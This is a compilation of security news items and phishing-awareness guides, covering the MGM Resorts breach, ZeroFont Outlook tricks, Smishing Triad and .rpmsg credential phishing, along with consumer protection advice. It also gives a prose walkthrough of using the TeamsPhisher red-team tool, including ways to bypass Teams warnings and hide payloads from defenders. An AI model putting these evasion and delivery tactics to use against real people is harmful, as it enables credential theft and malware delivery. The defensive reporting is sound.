MGM Resorts encountered a devastating cyberattack recently, incurring an approximate financial setback of $100 million. Unveiled on September 11, this digital attack led to the temporary shutdown of multiple systems within MGMâs various properties, disrupting operations and inflicting significant monetary losses.
DETAILS OF THE ATTACK
The digital onslaught on MGM Resorts wasnât confined to a single property but spread across its flagship resort and other prestigious properties like Mandalay Bay, Bellagio, The Cosmopolitan, and Aria. The cybercriminals managed to disrupt a range of operations, from the functioning of slot machines and the systems overseeing restaurant management to the technology behind room key cards. Despite the containment efforts by MGM, the attackers successfully exfiltrated a diverse set of customer data, including but not limited to names, addresses, phone numbers, driverâs license numbers, Social Security numbers, and passport details. Fortunately, credit card details remained secure and unaffected.
ECONOMIC FALLOUT
The cyber intrusion had a profound economic impact on MGM Resorts, with losses estimated around $100 million. This financial blow is anticipated to ripple through the earnings of the third and fourth fiscal quarters. However, MGM remains optimistic, projecting a 93% occupancy rate in October and planning for a complete operational recovery in Las Vegas by November. Expenses related to the cyberattack, including consultancy fees, legal services, and other related costs, amounted to less than $10 million.
COMPROMISE OF CUSTOMER DATA
A vast array of customer data, from Social Security numbers to passport details, was pilfered during the cyber attack. The total count of individuals affected by this breach remains uncertain as MGM has not issued any comments on this matter. Proactive measures have been initiated by MGM Resorts to assist the victims of this data breach, including the establishment of dedicated phone lines and informational websites. The company also intends to reach out to the affected individuals via email, extending offers for identity protection services.
IDENTITY OF THE ATTACKERS
Initially, the cyberattack was attributed to hackers affiliated with a group known as Scattered Spider. This group later joined forces with a Russian ransomware collective known as Black Cat/AlphV. Scattered Spider has a notorious reputation, being implicated in several major cyberattacks over the past year, targeting entities like Reddit, Riot Games, Coinbase, and even another major player in the casino industry, Caesars Entertainment.
RECOVERY AND RESPONSE
In response to the cyberattack, MGM Resorts took immediate action by shutting down all its systems to thwart further unauthorized access to customer data. Since these initial countermeasures, the companyâs domestic properties have seen a return to normalcy in operations, with the majority of systems that interact with guests being restored. Efforts are ongoing to bring the remaining affected systems back online, with full restoration anticipated in the near future.
CONCLUSION AND FUTURE IMPLICATIONS
The cyberattack experienced by MGM Resorts highlights the substantial risks and potential financial damages associated with digital security breaches in the hospitality sector. With the compromise of sensitive customer information and the incurrence of hefty financial losses, this incident serves as a stark reminder for all businesses in the industry to bolster their cybersecurity infrastructure to safeguard against future digital threats. The episode underscores the imperative for continuous investments in state-of-the-art cybersecurity mechanisms and protocols to preemptively mitigate the risks of future cyber-attacks and protect sensitive customer data.
Threat actors have begun utilizing an innovative approach to zero-point font obfuscation, a pre-existing technique, in an attempt to deceive users of Microsoft Outlook. They do so by creating an illusion that certain phishing emails have been thoroughly scanned and cleared by antivirus programs, thus increasing the chances of these deceptive emails bypassing security protocols. This not only aids in evading security measures but also enhances the probability of recipients falling prey to these fraudulent schemes.
Jan Kopriva, an analyst at the SANS Internet Storm Center, encountered a phishing email that cleverly employed text written in zero-pixel size font. This technique, originally documented by Avanan (a subsidiary of Check Point) researchers in 2018 and known as ZeroFont Phishing, was being utilized in a distinct and innovative manner, according to Koprivaâs observations. Historically, cyber attackers have integrated zero font size text within phishing emails to disrupt the continuity of text that is visible, making it increasingly difficult for automated email scanning systems like those implemented by Outlook to flag suspicious emails.
However, Kopriva noticed a variation in the use of the ZeroFont technique, which diverged from its original purpose. Instead of utilizing it to obstruct automated scanning systems from labeling the email as potentially harmful or fraudulent, it was applied to craft an illusion of trustworthiness for the recipient. Kopriva elaborated that the technique was being used to modify the text that is usually displayed in Outlookâs listing paneâa section adjacent to the body of emails that provides users with a sneak peek into the email content.
Rather than presenting the typical email subject line followed by the initial few lines of the emailâwhich could potentially raise red flags about a phishing attemptâthe listing pane under this technique displayed the subject line and an additional line of text. This added text falsely indicated that the email had undergone a security scan and was deemed safe by a threat protection service.
Avanan researchers have also discovered another manipulation of this technique, dubbed the âOne Fontâ technique. In these instances, threat actors embed extremely small text within the zero- or one-point font range as part of their strategy to develop more elusive and sophisticated phishing scams. This minuscule font size effectively dismantles email scanning techniques relying on semantic analysis, generating confusion for the scanning systems while remaining undetectable to the recipients due to its unreadable size.
In the specific phishing email Kopriva analyzed, the attackers ingeniously incorporated text that implied the email had been verified and secured. This was achieved by inserting text in zero font size ahead of the emailâs actual content. As a result, in Outlookâs listing pane, the user would see text confirming the emailâs security status immediately below the subject lineâinstead of the true opening line of the phishing email. This deceptive approach takes advantage of Outlookâs method of displaying email text, thus exploiting it to the attackerâs benefit.
Kopriva acknowledged the possibility that this tactic has been deployed undetected for a while now. Nonetheless, it represents an additional tool in the arsenal of cyber threat actors, enhancing their ability to launch effective phishing campaigns. As defenders against cyber threats, awareness of this tactic is crucial. He recommends that organizations actively engaged in conducting security awareness training focused on phishing should incorporate information on this technique. This knowledge would empower employees to recognize and appropriately respond to deceptive emails employing this technique as an anti-detection strategy, thus fortifying organizational defenses against such cyber threats.
TeamsPhisher is a Python3 software that was designed to make it easier for phishing messages and attachments to be sent to users of Microsoft Teams whose companies or organizations permit connection with outside parties. It is not feasible to transfer files to users of Teams who are not part of oneâs company in most circumstances. Recently, Max Corbridge (@CorbridgeMax) and Tom Ellson (@tde_sec) from JUMPSEC published a means to circumvent this limitation by modifying HTTP requests made by Teams in order to change who is sent a message with an attached file.
TeamsPhisher utilizes a number of other techniques, including some of Andrea Santeseâs (@Medu554) older ones, in addition to this one.For the authentication component of the attack flow as well as other basic utility functions, it relies significantly on TeamsEnum, a brilliant piece of work that was developed by Bastian Kanbach (@bka) of SSE.
TeamsPhisherâs goal is to include the most useful aspects of the aforementioned projects in order to provide a method that is robust, fully adaptable, and highly effective for authorized Red Team operations to use Microsoft Teams for phishing in access-related circumstances.
You will need to provide TeamsPhisher with an attachment, a message, and a list of people to target. After that, it will go over the list of targets while simultaneously uploading the attachment to the senderâs Sharepoint.
First, TeamsPhisher will enumerate the target user and check to see whether that person really exists and is able to receive messages from the outside world. After that, it will initiate a new conversation with the person you choose. Note that this is technically a âgroupâ conversation since TeamsPhisher contains the targetâs email address twice; this is a clever hack from @Medu554 that will circumvent the âSomeone outside your organization messaged you, are you sure you want to view itâ splash screen that might offer our targets a reason to stop and think twice about viewing the message.
The user who was identified will get the message that was sent to them along with a link to the attachment that was stored in Sharepoint after a new thread has been established between our sender and the target.
After this first message has been sent, the newly established thread will be visible in the senderâs Teams GUI and may be engaged with manually, if necessary, on a case-by-case basis. Users of TeamsPhisher are required to have a Microsoft Business account (as opposed to a personal one such as @hotmail, @outlook, etc.) that is licensed for both Teams and Sharepoint in order to utilize the software.
This indicates that you will require an AAD tenant as well as at least one user who has a license that corresponds to it. At the time of publishing, the AAD licensing center does have some free trial licenses available for download that are capable of meeting all of the prerequisites for using this product.
Before you may utilize the account with TeamsPhisher, you will have to ensure that you have at least once successfully logged into the personal Sharepoint site of the user with whom you will be exchanging messages. This should be something along the lines of tenantname-my.sharepoint.com/personal/myusername_mytenantname_onmicrosoft.com or tenantname-my.sharepoint.com/personal/myusername_mytenantname_mycustomdomain_tld. Alternatively, you could also use tenantname-my.sharepoint.com/personal/myusername_mytenantname_onmicrosoft.com.
In terms of the needs of the local community, We strongly advise upgrading to the most recent version of Python3. You will also require the authentication library developed by Microsoft:
To upload the file to a Sharepoint site, you will need to manually give the siteâs name. This would most likely be required in the event if the senderâs tenant makes use of a unique domain name (for example, one that does not adhere to the xxx.onmicrosoft.com norm). Just the singular name should be used; for instance, if your SharePoint site is located at mytest.sharepoint.com, you should use the âsharepoint mytest option.
Replace TeamPhisherâs standard greeting (âHi,â) with a personalized greeting that will be appended to the message that is supplied by the âmessage option. For instance, âGood afternoon,â or âSales team,â are examples.
By default, the Sharepoint link that is provided to targets may be accessed by anybody who has the link; to restrict access to the Sharepoint file so that it can only be viewed by the target who got it, use the âsecurelink option. Itâs possible that this will help shield your virus from the blue team.
TeamsPhisher will make an effort to determine the first name of each person it is targeting and will use that name in the welcome it sends to them. For instance, tom.jones@targettenant.onmicrosoft.com would get an email with the greeting âHi Tom, â as the first line of the message. This is not ideal and is dependant on the format of the emails that are being targeted; use the âpreview option to see whether or not this is a suitable match for the list of emails that you are targeting.
The preview version of TeamsPhisher will be executed. This will NOT send any messages to the target users; instead, the âfriendlyâ name that would be used by the âpersonalize option will be shown. In addition, a sample message that is indicative of what targets would receive with the current settings will be delivered to the senderâs Teams. You may log in to check how your message appears and make any required adjustments to it.
You may choose to have a delay of x seconds between each message sent to targets. Can be of assistance with rate-limiting concerns that may arise.
TeamsPhisher will determine which accounts are unable to receive messages from third-party organizations, which accounts do not exist, and which accounts have subscription plans that are incompatible with the attack vectors.
TeamsPhisher now enables login with sender accounts using multifactor authentication (MFA), thanks to code contributed by the TeamsEnum project.
If you use the âsecurelink flag, the recipients of the message will see a popup asking them to verify themselves before they can view the attachment in Sharepoint. You have the ability to determine if this adds an excessive number of additional steps or whether it adds âlegitimacyâ by sending them via the actual Microsoft login feature.
Mitigation By changing the choices associated with external access, which can be found in the Microsoft Teams admin center under Users > External access, companies may reduce the risk that is provided by the vulnerability that has been discovered.
Organizations are provided with the freedom to pick the optimal rights to match their requirements by Microsoft, including the ability to whitelist just particular external tenants for communications and a global block that prevents any communications from occurring.
Resecurity has identified a large-scale smishing campaign, tracked as Smishing Triad, targeting the US Citizens.
Earlier episodes have revealed victims from the U.K., Poland, Sweden, Italy, Indonesia, Japan and other countries â the group was impersonating the Royal Mail, New Zealand Postal Service (NZPOST), Correos (Spain), Postnord, Poste Italiane and the Italian Revenue Service (Agenzia delle Entrate). Similar scams have been observed before targeting Fedex and UPS.
The bad actors attributed to Chinese-speaking cybercriminals are leveraging a package tracking text scam sent via iMessage to collect personal (PII) and payment information from the victims with the goal of identity theft and credit card fraud. The cybercriminal group with the associated campaign has been named âSmishing Triadâ as it leverages smishing as the main attack vector and originates from China.
Smishing is a form of phishing that involves a text message or phone number. Victims will typically receive a deceptive text message that is intended to lure the recipient into providing their personal or financial information. These scammers often attempt to disguise themselves as a government agency, bank, or other organization to lend legitimacy to their claims, for example, a postal service like the United States Postal Service (USPS), asking to pay additional delivery fees via credit card. Once the victim shares payment information, the bad actors use it for fraudulent purposes and unauthorized charges.
Expecting the spike of this activity during summer time, USPS has timely warned about the growing risk of package tracking text scams sent via SMS/iMessage. The spike of this activity has been observed during August with big number of domain names registered by attackers.
The notable detail of âSmishing Triadâ campaign is that bad actors used solely iMessage sent from compromised Apple iCloud accounts as the main delivery method of malicious messages to victims instead of traditional SMS or calls how it was done in other scam campaigns like âPostalFuriousâ and âRedZeiâ observed by other researchers in the past.
âSmishing Triadâ also attacks online-shopping platforms and injects malicious code to intercept customer data. Around July 19, 2023 â there was identified a campaign conducted by the same actors targeting popular online-shopping platforms with malicious scenarios containing payment form impersonating Sumitomo Mitsui Banking Corporation (SMBC). Around same time, there were also identified customized forms impersonating New Zealand Transport Agency and the Agenzia delle Entrate (the Italian Revenue Agency), that enforces the financial code of Italy and collects taxes and revenue.
The bad actors also distribute an engine of fake online-shop (TrickyCart) allowing them to defraud consumers with a pseudo 3D Secure Payment form impersonating popular payment systems and e-commerce platforms including Visa, Mastercard and PayPal.
âSmishing Triadâ has own Telegram channel with over 2,725 members on it and several private groups. The actors are weaponizing other cybercriminals by selling them customized âsmishing kitsâ targeting popular U.S., U.K. and EU brands â starting at $200 per month provided on subscription with further support. Resecurity has identified a group of domain names used by âSmishing Triadâ registered in â.topâ zone via NameSilo and protected by Cloudflare around August 2023. Notably, some of the domain names are still functioning as well as the identified Telegram group managed by the actors.
After acquisition of the âsmishing kitâ, Resecurity was able to identify a vulnerability acting as a hidden backdoor in the code allowing actors to silently extract collected personal and payment data from their clients. According to researchers, such scenarios are widely used by cybercriminals in password stealers and phishing kits allowing them to profit from efforts of their clients or at least to monitor their activity. Resecurity was able to recover over 108,044 records with victimsâ compromised data in order to alert them about identity theft. The collected information has been shared with relevant law enforcement agencies and the United States Postal Inspection Service.
Resecurity highlighted that it may be complicated to disrupt such cybercriminal activity committed by foreign actors located in jurisdictions like China without proper law enforcement and industry collaboration. Therefor, Resecurity is sharing the information about the âSmishing Triadâ with the wider community and network defenders to raise awareness and safeguard their customers.
Further technical details are available in the report published by ReSecurity.
Phishers are using encrypted restricted-permission messages (.rpmsg) attached in phishing emails to steal Microsoft 365 account credentials.
â[The campaigns] are low volume, targeted, and use trusted cloud services to send emails and host content (Microsoft and Adobe),â say Trustwave researchers Phil Hay and Rodel Mendrez. âThe initial emails are sent from compromised Microsoft 365 accounts and appear to be targeted towards recipient addresses where the sender might be familiar.â
Phishing emails with Microsoft Encrypted Restricted Permission Messages
The phishing emails are sent from a compromised Microsoft 365 account to individuals working in the billing department of the recipient company.
Phishing email with a encrypted restricted-permission message (Source: Trustwave)
The emails contain a .rpmsg (restricted permission message) attachment and a âRead the messageâ button with a long URL that leads to office365.com for message viewing.
To see the message, the victims are asked to sign in with their Microsoft 365 email account or to request a one-time passcode.
After using the received passcode, the victims are first shown a message with a fake SharePoint theme and are asked to click on a button to continue. They are then redirected to a document that looks like itâs hosted on SharePoint but itâs actually hosted on the Adobeâs InDesign service.
They are again asked to click on a button to view the document, and are taken to a domain that looks like the one from the original sender (e.g., Talus Pay), featuring a progress bar.
In the background, the open source FingerprintJS library collects the userâs system and browser information and, finally, the victim is shown a spoofed Microsoft 365 login page and is asked to sign in with their credentials.
Hiding from security solutions
âThe use of encrypted .rpmsg messages means that the phishing content of the message, including the URL links, are hidden from email scanning gateways. The only URL link in the body of the message points to a Microsoft Encryption service,â Hay and Mendez noted.
âThe only clue that something might be amiss is the URL has a specified sender address (chambless-math.com) unrelated to the From: address of the email. The link was likely generated from yet another compromised Microsoft account.â
They advise organizations to:
Block, flag or manually inspect .rpmsg attachments
Monitor incoming email streams for emails originating from MicrosoftOffice365@messaging.microsoft.com and having the subject line âYour one-time passcode to view the messageâ
Educate users about the consequences of decrypting or unlocking content from unsolicited emails
Every day tens of thousands of Spear phishing emails are sent to millions of victims around the world.
Cyber-attacks have different pathways now; they can strike you from inside or outside, with equal damages across your network.
Targeted takedowns could be critical if analyzed and executed with absolute precision.
In this guide. Weâll look at Spear Phishing Attacks, techniques, examples, mitigation procedures, and a few best practices.
What is Spear Phishing?
Spear Phishing is a malicious practice that executes via Email campaigns that hackers research their target audience, understand their likes and dislikes, study their day to day operations, and customize the mail to steal sensitive data and install malware. This type of targeted email campaign deployment to infiltrate their target audience group is called Spear Phishing Attack.
Any anonymous email that drops into your inbox from an unknown sender can be assumed to be phishing Attack. Blasting millions of emails to the database of email idâs with malicious intent is called phishing.
It could be for the deployment of malware, remote code executions and more, however, this phishing may not be rewarding for hackers.
How does Spear Phishing Attack Work?
Spear Phishing is executed in four stages,
Target identification
Studying the targetâs behavior
Customizing the message
Blasting emails
Target identification:
The hackers initially identify their target victims by narrowing down their audience based on their motive of the campaign, this could be targeted at corporate in a particular vertical or patients of a healthcare company.
The identification procedure is divided into two stages, the primary and secondary target, primary target will be executives working for an MNC, who will be receiving the blasted emails and the secondary target will be the key ones who will have access to business sensitive information.
These primary targets that have become victims to the spear phishing attack will be manipulated to exploit the secondary targets.
Studying the targetâs behavior:
Gathering information about the targeted audience by digging deep into their social media profiles, job sites, portfolios, comments, likes and groups they belong to, and communities they belong to. One way or another the hackers will gain their personal information like email, phone numbers, first name, surname, history of experience, schooling, college, area of expertise and more which they will use to influence their potential targets.
Customizing the message
Hackers will customize their emails and message based on the information collected from these external resources for better open rates and reduced bounce rates. Once a successfully established message is obtained they will proceed for the email blasting procedure.
Blasting emails
After all the research hackers will prepare their attack vector and strategy to ensure the mail gets delivered to the target audience inbox and not into the spam folder.
They will disguise the sender details to be a legitimate one, to ensure the proper delivery of the mail is made and the end user opens it as expected.
After opening the email, the user will click a link or download an attachment-based on the content as it is made accurate.
With all research, the CTR will definitely be high. Thanks to the reliability of the mail crafting procedures the hackers have implemented.
What are 3 types of Spear-phishing emails?
Usually, hackers prefer one of three techniques below to manipulate their target audience.
Impersonation
Personalization
Emotional Response
Impersonation
As the name defines, hackers pretend to be someone else or a legal entity to establish trust and elude with data. This technique is very commonly used by disguising a genuine person or entity in the sender section with an indistinguishable subject line.
Personalization
This technique has an excellent success rate, as the message is very much customized for the recipient so he believes that this email will be of use to him or for his profession in general.
Emotional Response
This technique creates a fear, happiness, shock or surprise to make the end user open the mail and click/download the malicious content as planned.
What is an example of spear phishing?
Examples of Spear Phishing Attacks are very much targeted and often have disastrous outcomes for enterprises, below are few examples for successful spear phishing attacks.
Ubiquite Networks Inc
This Company paid more than USD $40 million in 2015, as a result of spear phishing attack because of a CEO fraud. The emails were impersonated as if they were from senior executives to transfer funds to a third party entity in Hong Kong, which was then found to be some anonymous entity and not a genuine third party.
RSA
RSA is a leading security firm but unfortunately, even they themselves become victim to a targeted spear phishing attack in 2011.
Mails with subject line â2011 Recruitment Planâ were blasted, though most of it was marked as spam one user opened it, leading to the deployment of malware into the infected system and eventually gave remote access to the hackers to infiltrate the computer and network.
Amazon
Amazon is another leader among the fortune 500 companies, targeting this firm will definitely improve your success rates for spear phishing.
In 2015, a mass spear phishing attack was unleashed targeting Amazon customers with a subject line âYour Amazon.com order has been dispatchedâ, followed by a code.
However, unlike the normal emails from Amazon, where you could see the dispatch status directly in the mail or via your Amazon account, in this case, it was mentioned to be available in the attachment.
Few employees become prey to this maneuver and a Locky ransomware was downloaded and installed in the infected systems to encrypt data and demand ransom.
How can you protect yourself from phishing?
Spear phishing prevention is a process that depends on different factors like awareness, tools, education, emotional response and more. Below are the best practices that both organizations and individuals should practice to protect yourself from phishing,
Increasing cyber awareness
Employing cyber tools
Identifying fake emails
Avoiding clicks and attachments
Avoid mails that force urgency
According to a report from Intel 97% of people were unable to identify a phishing mail. The best suggestion to apply spear phishing prevention by creating cyber awareness and improving cyber education. Spear phishing prevention is a process that will depend on a number of factors and their amount of precision.
Increasing cyber awareness:
Organizations and individuals should improve their cyber awareness either themselves or through cyber guidelines. Understanding the attack vectors, their mechanisms, procedures and possible procedures can help the end users and individuals prepare themselves any potential phishing scams and ensure they avoid them all times.
Employing cyber tools
As already mentioned in earlier sections, no tools are good against phishing attacks but properly configured browser policies, email filters, and endpoint configurations can reduce the chances of becoming a victim to phishing scams. GPO policies for stronger passwords and firewall configurations could also help organizations secure their users against phishing mails.
Identifing fake emails
Users can also distinguish between a genuine and fake mail by looking at the subject line, the sender and the relativity. Based on the content of the email this can be re-confirmed. Any unknown senders or purpose of the mail could be a potential phishing scam.
Avoiding clicks and attachments
Not all phishing scams do work when the mail is opened, most is switched ON only when the link in the mail is being clicked or an attachment is being opened. So the users need to ensure they are aware of the links and attachments, perhaps by hovering over the link or looking at the attachment file.
Avoid mails the force urgency
Users should avoid emails that create an urgency; emotional response is what will become prey to these sort of phishing emails. Any emotional mail that create a fear, surprise, shock, or personalized emotional response based on your tax, and health metrics should be avoided.
Spear Phishing Infographic
Organizations need to have few policies and configurations in place to keep phishing mails away from the enterprise network, however when users expose themselves to public networks only a self-analysis and cyber practices can keep them safe against spear phishing attack.
If you guys have ever experienced a phishing email, or do have an example to share, please free to comment below your experiences and message so we will see some real-time information on this threat.
Spear phishing attacks are hard to detect and mitigate, so keep your browsers and firewalls active and updated.
Welcome to our February 2023 review of phishing attacks, in which we explore the latest email scams and the tactics that cyber criminals use to trick people into handing over personal data.
This month, we look at a UK government warning about a resurgence in Russian cyber attacks and concerns that the much-discussed AI programme ChatGPT could be used for fraud.
UK government warns of Russian-sponsored phishing campaign
The UK government has issued a warning amid an increase in phishing attacks stemming from Russia and Iran.
In an advisory statement, the NCSC (National Cyber Security Centre) shared details about the campaign, which appears to have been sponsored by the fraudstersâ national governments.
The researchers are most concerned about spear phishing, which is a sophisticated form of fraud. Scammers target specific individuals by researching them online â often using Facebook, LinkedIn or the website of the targetâs employer.
Although spear phishing emails often contain the same clues as regular phishing scams, they have a much higher success rate. This suggests that people are more likely to assume that a message is genuine if it contains a few specific details about them, such as their name or their place of work.
The NCSCâs advisory highlights ongoing scams that were conducted throughout last year by the Russia-based group SEABORGIUM and the Iran-based group TA453, also known at APT42.
Their attacks target specific sectors within the UK, including academia, defence, governmental organisations, NGOs and thinktanks, as well as politicians, journalists and activists.
Commenting on the findings, NCSC Director of Operations Paul Chichester said: âThe UK is committed to exposing malicious cyber activity alongside our industry partners and this advisory raises awareness of the persistent threat posed by spear-phishing attacks.
âThese campaigns by threat actors based in Russia and Iran continue to ruthlessly pursue their targets in an attempt to steal online credentials and compromise potentially sensitive systems.
âWe strongly encourage organisations and individuals to remain vigilant to potential approaches and follow the mitigation advice in the advisory to protect themselves online.â
Experts concerned that ChatGPT could be used for scams
ChatGPT has taken the Internet by storm, with the AI-backed tool helping writers and hobbyists create content almost instantly.
The programâs advanced language model has been championed by people looking to quickly produce quotes, articles and think pieces. However, cyber security experts are warning that another group â scammers â could also embrace the technology.
As Chester Wisniewski, the principal research scientist as Sophos, explained, ChatGPT can instantly produce grammatically correct and natural-looking writing, which would resolve one the biggest challenges that scammers face when creating their baits.
âThe first thing I do whenever you give me something is figuring out how to break it. As soon as I saw the latest ChatGPT release, I was like, âOK, how can I use this for bad things?â Iâm going to play to see what bad things I can do with it,â Wisnieski told TechTarget.
One of those âbad thingsâ that he considered was the ability for ChatGPT to create phishing scams.
âIf you start looking at ChatGPT and start asking it to write these kinds of emails, itâs significantly better at writing phishing lures than real humans are, or at least the humans who are writing them,â he said.
âMost humans who are writing phishing attacks donât have a high level of English skills, and so because of that, theyâre not as successful at compromising people.
âMy concerns are really how the social aspect of ChatGPT could be leveraged by people who are attacking us. The one way weâre detecting them right now is we can tell that theyâre not a professional business.
âChatGPT makes it very easy for them to impersonate a legitimate business without even having any of the language skills or other things necessary to write a well-crafted attack.â
Can you spot a scam?
All organisations are vulnerable to phishing, no matter their size or sector, so itâs essential to understand how you might be targeted and what you can do to prevent a breach.
This 45-minute course uses real-world examples like the ones weâve discussed here to explain how phishing attacks work, the tactics that cyber criminals use and how you can detect malicious emails.
This recent phishing campaign tricks victims by using Facebook posts in its chain of attacks. The emails that were sent to the targets made it appear as though one of the recipientsâ Facebook posts violated copyright, and they threatened to remove their accounts if no appeal was made within 48 hours.
Phishing email message
âThe content of this Facebook post appears legitimate because it uses a dummy âPage Supportâ profile with the Facebook logo as its display picture. At first glance, the page looks legitimate, but the link provided in this post leads to an external domainâ, according to Trustwave.
Here the Facebook post pretends to be âPage Support,â using a Facebook logo to appear as if the company manages it.
Facebook post masqueraded as a support page
The main phishing URL, hxxps:/meta[.]forbusinessuser[.]xyz/main[.]php, which resembles Facebookâs copyright appeal page, is reached by clicking the link in the post.
Particularly, any data that victims enter into the form after hitting the send button, along with the victimâs client IP and geolocation data will be forwarded to hackers.
Also, threat actors may gather more data to get through fingerprinting protections or security questions while gaining access to the victimâs Facebook account.
The victim is then redirected to the next phishing website, where a false 6-digit one-time password (OTP) request with a timer is displayed.
Phishing page with OTP request
Any code entered by the victim will fail, and if the âNeed another way to authenticate?â button is pressed, the site will redirect to the real Facebook site.
According to Trustwave, multiple Facebook profiles have fake messages that look to be support pages and direct users to phishing websites.
Various Facebook accounts promoting the same fake alerts
Therefore, these fake Facebook âViolationâ notifications use real Facebook pages to redirect to external phishing sites. Users are urged to take extreme caution when receiving false violation alerts and to not fall for the initial linksâ seeming legitimacy.
A phishing scam is not only about stealing your login credentials, but it can also install malware, including ransomware, which is why it is essential to learn how to tackle this growing threat.
The number of phishing scams reported in the first quarter of 2022 set a new record of over one million total attacks, according to a report by the Anti-Phishing Working Group.
And the scams have been growing fast in recent years. The number of attempts reported in the first quarter of 2022 is more than triple the average numbers just two years before, in early 2020.
With so many attacks underwayâand growing by the dayâwhatâs the best way to recognize these scams and prevent them? Weâll look at how to recognize and protect yourself from the most common types of phishing fraud. Meanwhile, you can also learn how to detect phishing images in an email.
Most prevalent types of phishing scams
Phishing today refers to a type of scam that steals peopleâs personal information by posing as a trusted third party. For example, a scammer might pretend to be a government worker to get you to share your Social Security number or pretend to be from your bank to get you to share account details.
With so many communication channels today, there are more phishing methods than ever before. And scammers have adapted to each type of channel by leveraging trust signals inherent to each one.
This can make it hard for the untrained eye to spot a phishing scam and even difficult to recognize if youâve been hackedafter falling for an attack. The first sign that tips off most victims is an unexpected charge, damaged credit score, or depleted bank account.
Here are the six most common types of phishing scams and how to protect yourself.
1. Email scams
Anyone can fall for an email scam; this U.S. judge did. By far the most common type of phishing attack is via email. Youâre probably familiar with the spam emails we all get on a day-to-day basis, but the most sophisticated phishing attacks look very different.
These emails often look identical to official messages and notifications, including the companyâs logo and exactly the same content as a real message. For example, one of todayâs most common scams is a message notification from LinkedIn thatâs almost impossible to tell apart from the real thing.
How to protect yourself:
Never click on links in emails. Instead, visit the official site.
Beware of email addresses that arenât from the business domain, especially if the address is from a free provider like Gmail.
Another common method fraudsters use to trick victims is over the phone. These calls usually claim to have a one-of-a-kind offer or urgent, life-threatening warning.
Most scammers use a VoIP phone system that lets them change the phone number, meaning the call appears as though itâs from a local number even if itâs not.
How to protect yourself:
Never answer calls from numbers you donât recognize, even if it has a local area code.
Donât return calls from numbers. you donât recognize (one type of scam collects expensive per-dial and per-minute fees, hoping youâll call back).
Remember that most U.S. government agencies, including the IRS, Medicare, and the Social Security Administration, almost never call by phone and do not have the power to arrest you.
3. Phishing websites
One of the most common destinations for phishing scams is a fraudulent site that looks like the official website. The cloned site will often be identical to the real page, using the companyâs logos, color scheme, and fonts.
After establishing trust with the design, the site will ask you to share personal information, anything from your email and password to your Social Security number or bank account details. For example, this attack impersonating American Express used an email message and web page almost impossible to tell apart from the real brand.
Phishing email and the phishing page (Screenshots via Armorblox)
How to protect yourself:
If you get a message with a linkâeven if it looks trustworthyâgo to the official site instead.
Check the URL of a website to make sure itâs correct. (Youâll notice the American Express phishing page above comes from a site other than AmericanExpress.com.)
Donât automatically trust an HTTPS connection. The âgreen padlockâ icon is an important trust signal, but it doesnât mean a site is safe. Hackers can use them on phishing sites, too.
4. SMS text message scams (smishing)
Text messages donât have much space for the scammerâs message, but that hasnât stopped criminals from trying new tactics to trick innocent victims. The goal of most SMS scams is to get you to click on a link or make a call, so immediately be suspicious of any message with a link or number (though of course, some legitimate messages have these as well).
One of the most common ruses right now with text scams is, ironically enough, helping to protect you from scams. Youâll often see a message âconfirmingâ an expensive purchase or withdrawal, directing you to a number or link to cancel or investigate. There is nothing to cancel or investigate, but the scammer will pretend to resolve the situation by collecting your personal data for a future attack.
How to protect yourself:
Donât trust texts from numbers you donât recognize. Instead, visit the official site.
Beware of texts that use vague terms like âyour bankâ or âpackage service.â Scammers use these (instead of actual company names) so the message can apply to anyone.
Donât reply to scam messages, even unsubscribe. This only confirms you have an active number and will result in more attacks.
5. Social media phishing
Social media has become one of the more recent additions to the phishing repertoire. Scammers reach out either using a fake lookalike account or a compromised account.
One common ruse is a friend reaching out for help, usually with an authentication code. But itâs not a friendâitâs a scammer whoâs taken over their account and is trying to take over yours. Another ruse is a message from someone posing as the official company support account, asking you to provide information to verify youâre the authentic owner or to keep your page active.
Fake Support chatbot (Image: Trustwave)
How to protect yourself:
Beware of anyone who reaches out and asks for personal information or verification codes, even if they appear to be coming from a friend.
Donât respond to messages from âofficialâ accounts. If youâve received an alert from the social networking site, itâll usually appear in your account settings.
Donât ever share your social media password with a third-party website.
6. Man-in-the-middle attack
This type of phishing scam requires the attacker to be nearby but can be one of the most dangerous because itâs almost impossible to detect. It works when you and the attacker are on the same Wi-Fi network, like at a coffee shop or airport. The attacker intercepts everything you send and receive and can redirect your browser to safe sites to look-alike sites without you knowing.
Once the attacker has set up a man-in-the-middle attack, they can see almost all the information you share, including usernames, passwords, credit card details, and more.
How to protect yourself:
Never use public Wi-Fi networks. A better option is to connect to a hotspot from your cell phone, which has a secure and private connection.
If you have to use public Wi-Fi, turn on a VPN. This can protect you against most types of man-in-the-middle attacks and safeguard your personal details.
How to prevent phishing
Every type of phishing requires a slightly different method to spot, and scammers are constantly developing new methods that leverage our weaknesses. But there are a few common warning signs you can look for across different types of phishing attacks.
Unfamiliar senders. Emails, texts, or calls from people you donât recognize are automatically suspect.
Poor spelling or grammar. Major corporations pay careful attention to small details like this. Scammers, on the other hand, donât usually worry about a few typos and often use poor English.
Urgency and threats. Scammers demand immediate action or scare you using intimidation tactics, like arrest or deportation, so you donât recognize warning signs of a scam.
Unusual payment methods. Phishing scams often take the opportunity to charge a âfeeâ for a service but will only accept forms of payment like gift cards, money orders, or cryptocurrency. Legitimate businesses use other methods.
What to do if youâre a victim of phishing
Youâve learned how to protect yourself from phishing scams, but what if youâve already fallen victim? If you know youâve shared information with a scammer, hereâs what you should do, based on what information youâve shared.
Credit or debit card details. Call the issuing company and have the card canceled immediately. Ask to reverse or dispute any fraudulent charges.
Login details or passwords. Log into the compromised account, change the password, look for an option to close all active sessions, and add two-factor authentication if possible. Do the same for any other accounts using the same password.
Medical insurance information. Call your insurance company and any impacted companies, explain the fraud, and dispute any fraudulent charges.
Social Security number. Set up a credit freeze at each of the three credit bureaus (Experian, Equifax, and TransUnion). This prevents anyone from requesting credit in your name.
Name, email, date of birth, or other information. Keep a close eye on your accounts for signs of identity theft.
No matter what kind of information youâve shared, itâs always a good idea to report the fraud to the Federal Trade Commission at IdentityTheft.gov. Filing the report helps protect others, gives you documentation of the attack, and will provide you with recovery steps specific to your situation
Conclusion
Phishing attacks are on the rise, and scammers are developing even more intricate scams all the time. But if you know the most common warning signs and stay vigilant, you can protect yourself and take quick action in case youâve been compromised.
With the release of the PhaaS platform called âCaffeineâ, threat actors can now easily launch their own sophisticated phishing attacks. Anyone who wants to start their own phishing campaign will be able to register on this platform through an open registration process.
Caffeine has been thoroughly tested by the analysts at Mandiant. This is a free and open-source platform that does not require any specific requirements like the following to use its portal for launching Phishing campaigns:-
No invites or referrals required
No approval needed
